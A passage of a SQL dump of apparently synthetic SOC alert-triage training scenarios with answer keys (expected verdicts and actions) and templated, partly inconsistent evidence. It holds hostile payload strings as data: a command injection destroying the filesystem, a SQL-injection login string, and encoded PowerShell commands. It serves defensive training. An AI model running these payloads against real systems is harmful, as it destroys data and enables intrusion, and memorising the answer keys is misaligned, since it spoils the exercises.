[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:42:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"michael.brown\\\",\\\"hostname\\\":\\\"DESKTOP-07\\\",\\\"command_line\\\":\\\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.367Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:42:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"michael.brown\\\",\\\"hostname\\\":\\\"DESKTOP-07\\\",\\\"command_line\\\":\\\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(722, 'False Positive: Anomalous Login Activity', 'medium', 'Splunk', 'Multiple failed login attempts detected from a foreign IP address. Investigation reveals this is a legitimate user traveling.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:05:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"104.28.0.34\",\"dst_ip\":\"10.0.0.12\",\"username\":\"john.doe\",\"hostname\":\"SERVER-02\",\"failed_attempts\":8}', '2026-01-10 00:28:18', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"104.28.0.34\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not associated with malicious activity, identified as part of legitimate travel\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"User confirmed to be on business trip\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"User was traveling, resulting in login attempts from an unusual location. 
No malicious intent detected.\"}', 'Advanced', 'SIEM', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.368Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:05:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"104.28.0.34\\\",\\\"dst_ip\\\":\\\"10.0.0.12\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:31:22.368Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:05:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"104.28.0.34\\\",\\\"dst_ip\\\":\\\"10.0.0.12\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:30:22.368Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:05:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"104.28.0.34\\\",\\\"dst_ip\\\":\\\"10.0.0.12\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:29:22.368Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:05:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"104.28.0.34\\\",\\\"dst_ip\\\":\\\"10.0.0.12\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:28:22.368Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:05:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"104.28.0.34\\\",\\\"dst_ip\\\":\\\"10.0.0.12\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"failed_attempts\\\":8}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(723, 'APT41 Spear-Phishing Attack Detected via Malicious Email Link', 'critical', 'Proofpoint', 'A spear-phishing email containing a malicious link was detected targeting a high-level executive. The email was crafted to appear as a legitimate communication from a trusted partner.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:15:23Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.112\",\"dst_ip\":\"192.168.1.105\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAPTOP-12\",\"email_sender\":\"ceo@trustedpartner.com\",\"url\":\"http://malicious-link.com/verify\",\"subject\":\"Urgent: Verify Your Account\"}', '2026-01-10 09:08:55', '2026-02-16 18:04:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1024 times for phishing and spam activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/verify\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"ceo@trustedpartner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Spoofed domain detected\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The alert is a true positive as the email contained a malicious link that was confirmed to be part of a phishing campaign.\"}', 'Expert', 'NDR', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"APT41 Spear-Phishing Attack Detected via Malicious Email 
Link\",\"date\":\"2026-02-01T20:32:22.369Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(724, 'Lazarus Group Fileless Malware Execution Detected', 'high', 'CrowdStrike', 'A fileless malware was executed using PowerShell obfuscation techniques. The execution was traced back to a known Lazarus Group C2 server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:37:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.47\",\"dst_ip\":\"192.168.1.45\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"powershell -enc WwBTAFkAUwB0AGUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBuAHQAXQAuAEQAbwB3AG4AbABvAGEAZABTAHIAdABhAG0AIAA=\",\"file_hash\":\"4c2f5e0b9a3b4f1f8c37a3f9f2a4b1d0\"}', '2026-01-10 02:51:53', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.47\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Associated with Lazarus Group C2 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -enc WwBTAFkAUwB0AGUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBuAHQAXQAuAEQAbwB3AG4AbABvAGEAZABTAHIAdABhAG0AIAA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected obfuscation technique used by APT actors\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4c2f5e0b9a3b4f1f8c37a3f9f2a4b1d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in recent fileless malware campaigns\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of PowerShell obfuscation and the link to a known Lazarus C2 server confirms this as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(725, 'Cozy Bear Command Injection via Web Request', 'critical', 'Wazuh', 'A command injection attempt was detected via a vulnerable web application endpoint, originating from a Cozy Bear associated IP.', 'Web Attack', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:02:59Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.200\",\"username\":\"webapp\",\"hostname\":\"WEB-SERVER-03\",\"request_body\":\"id=1; rm -rf /\",\"url\":\"http://victim-site.com/update\"}', '2026-01-11 02:15:21', '2026-02-16 18:03:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple Cozy Bear related attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"id=1; rm -rf /\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://victim-site.com/update\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"URL targeted in previous Cozy Bear campaigns\"}}],\"expected_actions\":[\"block_ip\",\"patch_vulnerability\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The command injection payload and known Cozy Bear IP confirm this as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.371Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:02:59Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"webapp\\\",\\\"hostname\\\":\\\"WEB-SERVER-03\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://victim-site.com/update\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.371Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:02:59Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"webapp\\\",\\\"hostname\\\":\\\"WEB-SERVER-03\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://victim-site.com/update\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.371Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:02:59Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"webapp\\\",\\\"hostname\\\":\\\"WEB-SERVER-03\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://victim-site.com/update\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.371Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:02:59Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"webapp\\\",\\\"hostname\\\":\\\"WEB-SERVER-03\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://victim-site.com/update\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.371Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:02:59Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"webapp\\\",\\\"hostname\\\":\\\"WEB-SERVER-03\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://victim-site.com/update\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(726, 'False Positive: Legitimate Network Activity Misidentified as Brute Force', 'medium', 'Splunk', 'Multiple login attempts were detected from an internal network IP address. The activity was later confirmed to be a legitimate script testing user access.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:50:12Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"192.168.1.30\",\"username\":\"testuser\",\"hostname\":\"AUTH-SERVER\",\"failed_attempts\":15}', '2026-01-10 01:14:37', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for legitimate script execution\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"testuser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"User account involved in authorized testing\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The alert was a false positive as the activity was part of a legitimate internal testing process.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.372Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:50:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"AUTH-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:31:22.372Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:50:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"AUTH-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:30:22.372Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:50:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"AUTH-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:29:22.372Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:50:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"AUTH-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:28:22.372Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password 
for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:50:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"testuser\\\",\\\"hostname\\\":\\\"AUTH-SERVER\\\",\\\"failed_attempts\\\":15}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(727, 'Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A phishing email was detected attempting to harvest credentials using a malicious URL disguised as an Office365 login page.', 'Phishing', 'T1566', 1, 'investigating', 85, '{\"timestamp\":\"2026-01-11T09:15:23Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe@examplecorp.com\",\"hostname\":\"mailserver.examplecorp.com\",\"email_sender\":\"support@off1ce365-login.com\",\"url\":\"http://off1ce365-login.com/login\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-01-11 05:36:16', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@off1ce365-login.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain registered 3 days ago and associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://off1ce365-login.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting phishing page mimicking Office365 login\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal email server IP\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a known phishing URL and a suspicious sender domain indicating a phishing attempt.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected with Malicious URL\",\"date\":\"2026-02-01T20:32:22.373Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(728, 'Brute Force Attack Detected from Known Malicious IP', 'critical', 'Wazuh', 'Multiple failed login attempts detected from a foreign IP, indicating a brute force attack targeting the internal network.', 'Brute Force', 'T1110', 1, 'Closed', 93, '{\"timestamp\":\"2026-01-11T11:32:13Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.10\",\"username\":\"administrator\",\"hostname\":\"server01.examplecorp.com\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":37}', '2026-01-09 18:10:39', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 174 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common administrative account targeted in attacks\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network server\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The attack originated from a known malicious IP with multiple failed login attempts, indicating brute force activity.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.374Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:32:13Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server01.examplecorp.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:31:22.374Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:32:13Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server01.examplecorp.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:30:22.374Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:32:13Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server01.examplecorp.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:29:22.374Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:32:13Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server01.examplecorp.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":37}\"},{\"timestamp\":\"2026-02-01T20:28:22.374Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:32:13Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"server01.examplecorp.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":37}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
